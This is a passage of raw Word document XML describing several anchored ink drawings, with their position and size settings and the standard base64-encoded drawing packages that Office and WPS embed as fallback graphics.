o:gfxdata="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aQgA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABgAAAAAAAAAA&#10;ABAAAAA0BgAAX3JlbHMvUEsBAhQAFAAAAAgAh07iQIoUZjzRAAAAlAEAAAsAAAAAAAAAAQAgAAAA&#10;WAYAAF9yZWxzLy5yZWxzUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAQAAAA&#10;AAAAAGRycy9QSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAACgAAAAAAAAAAABAAAABSBwAAZHJz&#10;L19yZWxzL1BLAQIUABQAAAAIAIdO4kB5GLyduAAAACEBAAAZAAAAAAAAAAEAIAAAAHoHAABkcnMv&#10;X3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsBAhQAFAAAAAgAh07iQM09wsfaAAAACgEAAA8AAAAAAAAA&#10;AQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kBAeC2QogEAAIkDAAAOAAAA&#10;AAAAAAEAIAAAACkBAABkcnMvZTJvRG9jLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAI&#10;AAAAAAAAAAAAEAAAAPcCAABkcnMvaW5rL1BLAQIUABQAAAAIAIdO4kBsZZCH6QIAAO8GAAAQAAAA&#10;AAAAAAEAIAAAAB0DAABkcnMvaW5rL2luazEueG1sUEsFBgAAAAAKAAoATAIAAJ8JAAAAAA==&#10;">
                <v:imagedata r:id="rId40" o:title=""/>
                <o:lock v:ext="edit"/>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3597910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>59055</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="402590" cy="506730"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="42" name="墨迹 42"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId41">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="42" name="墨迹 42"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4283710" y="8105775"/>
                            <a:ext cx="402590" cy="506730"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:283.3pt;margin-top:4.65pt;height:39.9pt;width:31.7pt;z-index:251663360;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;fANP39z46k/fBnzTr7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HkYvJ24AAAAIQEAABkAAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzhc+x&#10;asQwDAbgvdB3MNobJR3KUeJkOQ6ylhRuNY6SmMSysZzSe/t67MHBDRqE0PdLbf/rd/VDSVxgDU1V&#10;gyK2YXK8aPgeL28nUJINT2YPTBpuJNB3ry/tF+0mlyVZXRRVFBYNa87xE1HsSt5IFSJxmcwheZNL&#10;mxaMxm5mIXyv6w9M/w3o7kw1TBrSMDWgxlssyc/tMM/O0jnYwxPnBxFoD8nBX/1eUJMWyhocb1iq&#10;qcqhgF2Ld491f1BLAwQUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAFtDb250ZW50X1R5cGVzXS54&#10;bWyVkcFOwzAQRO9I/IPlK0qc9oAQatIDKUdAqHyAZW8Sq/ba8prQ/j1O2l4QpeLgg70zb0br1Xrv&#10;LBshkvFY80VZcQaovDbY1/xj+1w8cEZJopbWI9T8AMTXze3NansIQCy7kWo+pBQehSA1gJNU+gCY&#10;J52PTqZ8jb0IUu1kD2JZVfdCeUyAqUgTgzerFjr5aRPb7PPzsUkES5w9HYVTVs1lCNYomXJTMaL+&#10;kVKcEsrsnDU0mEB3uQYXvyZMk8sBJ99rXk00GtibjOlFulxD6EhC+y+MMJZ/Q6aWjgrfdUZB2UZq&#10;s+0dxnOrS3RY+tar/8I3s+sa2+BO5LO4Qs8SZ88sMX928w1QSwECFAAUAAAACACHTuJAAxUp2gUB&#10;AAAtAgAAEwAAAAAAAAABACAAAAArCQAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO&#10;4kAAAAAAAAAAAAAAAAAGAAAAAAAAAAAAEAAAAPYGAABfcmVscy9QSwECFAAUAAAACACHTuJAihRm&#10;PNEAAACUAQAACwAAAAAAAAABACAAAAAaBwAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAA&#10;AAAAAAAAAAAABAAAAAAAAAAAABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAA&#10;AAAKAAAAAAAAAAAAEAAAABQIAABkcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24AAAAIQEA&#10;ABkAAAAAAAAAAQAgAAAAPAgAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACH&#10;TuJAFXnyZdcAAAAIAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAA&#10;AAgAh07iQGPUaJefAQAAigMAAA4AAAAAAAAAAQAgAAAAJgEAAGRycy9lMm9Eb2MueG1sUEsBAhQA&#10;CgAAAAAAh07iQAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAQAAAA8QIAAGRycy9pbmsvUEsBAhQAFAAA&#10;AAgAh07iQEaKmXexAwAAqggAABAAAAAAAAAAAQAgAAAAFwMAAGRycy9pbmsvaW5rMS54bWxQSwUG&#10;AAAAAAoACgBMAgAAYQoAAAAA&#10;">
                <v:imagedata r:id="rId42" o:title=""/>
                <o:lock v:ext="edit"/>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4175125</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>139700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471805" cy="135890"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="47" name="墨迹 47"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId43">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="47" name="墨迹 47"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4860925" y="8186420"/>
                            <a:ext cx="471805" cy="135890"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:328.75pt;margin-top:11pt;height:10.7pt;width:37.15pt;z-index:251668480;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;FQt0Rg+LqoIkC1VgqIqGsMPdiyMwzgju9uU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HkYvJ24AAAAIQEAABkAAABkcnMvX3JlbHMvZTJvRG9j&#10;LnhtbC5yZWxzhc+xasQwDAbgvdB3MNobJR3KUeJkOQ6ylhRuNY6SmMSysZzSe/t67MHBDRqE0PdL&#10;bf/rd/VDSVxgDU1VgyK2YXK8aPgeL28nUJINT2YPTBpuJNB3ry/tF+0mlyVZXRRVFBYNa87xE1Hs&#10;St5IFSJxmcwheZNLmxaMxm5mIXyv6w9M/w3o7kw1TBrSMDWgxlssyc/tMM/O0jnYwxPnBxFoD8nB&#10;X/1eUJMWyhocb1iqqcqhgF2Ld491f1BLAwQUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAFtDb250&#10;ZW50X1R5cGVzXS54bWyVkcFOwzAQRO9I/IPlK0qc9oAQatIDKUdAqHyAZW8Sq/ba8prQ/j1O2l4Q&#10;peLgg70zb0br1XrvLBshkvFY80VZcQaovDbY1/xj+1w8cEZJopbWI9T8AMTXze3NansIQCy7kWo+&#10;pBQehSA1gJNU+gCYJ52PTqZ8jb0IUu1kD2JZVfdCeUyAqUgTgzerFjr5aRPb7PPzsUkES5w9HYVT&#10;Vs1lCNYomXJTMaL+kVKcEsrsnDU0mEB3uQYXvyZMk8sBJ99rXk00GtibjOlFulxD6EhC+y+MMJZ/&#10;Q6aWjgrfdUZB2UZqs+0dxnOrS3RY+tar/8I3s+sa2+BO5LO4Qs8SZ88sMX928w1QSwECFAAUAAAA&#10;CACHTuJAAxUp2gUBAAAtAgAAEwAAAAAAAAABACAAAABTCAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBL&#10;AQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAGAAAAAAAAAAAAEAAAAB4GAABfcmVscy9QSwECFAAU&#10;AAAACACHTuJAihRmPNEAAACUAQAACwAAAAAAAAABACAAAABCBgAAX3JlbHMvLnJlbHNQSwECFAAK&#10;AAAAAACHTuJAAAAAAAAAAAAAAAAABAAAAAAAAAAAABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO&#10;4kAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAEAAAADwHAABkcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07i&#10;QHkYvJ24AAAAIQEAABkAAAAAAAAAAQAgAAAAZAcAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQ&#10;SwECFAAUAAAACACHTuJAPj5qXdkAAAAJAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAhQAFAAAAAgAh07iQEZiD8CiAQAAiwMAAA4AAAAAAAAAAQAgAAAAKAEAAGRycy9lMm9E&#10;b2MueG1sUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAQAAAA9gIAAGRycy9p&#10;bmsvUEsBAhQAFAAAAAgAh07iQCEtO77UAgAAsgYAABAAAAAAAAAAAQAgAAAAHAMAAGRycy9pbmsv&#10;aW5rMS54bWxQSwUGAAAAAAoACgBMAgAAiQkAAAAA&#10;">
                <v:imagedata r:id="rId44" o:title=""/>
                <o:lock v:ext="edit"/>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4696460</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="405765" cy="88900"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="51" name="墨迹 51"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId45">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="51" name="墨迹 51"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="5382260" y="8200390"/>
                            <a:ext cx="405765" cy="88900"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:369.8pt;margin-top:12.1pt;height:7pt;width:31.95pt;z-index:251672576;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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5GLyduAAAACEBAAAZAAAAZHJzL19yZWxzL2U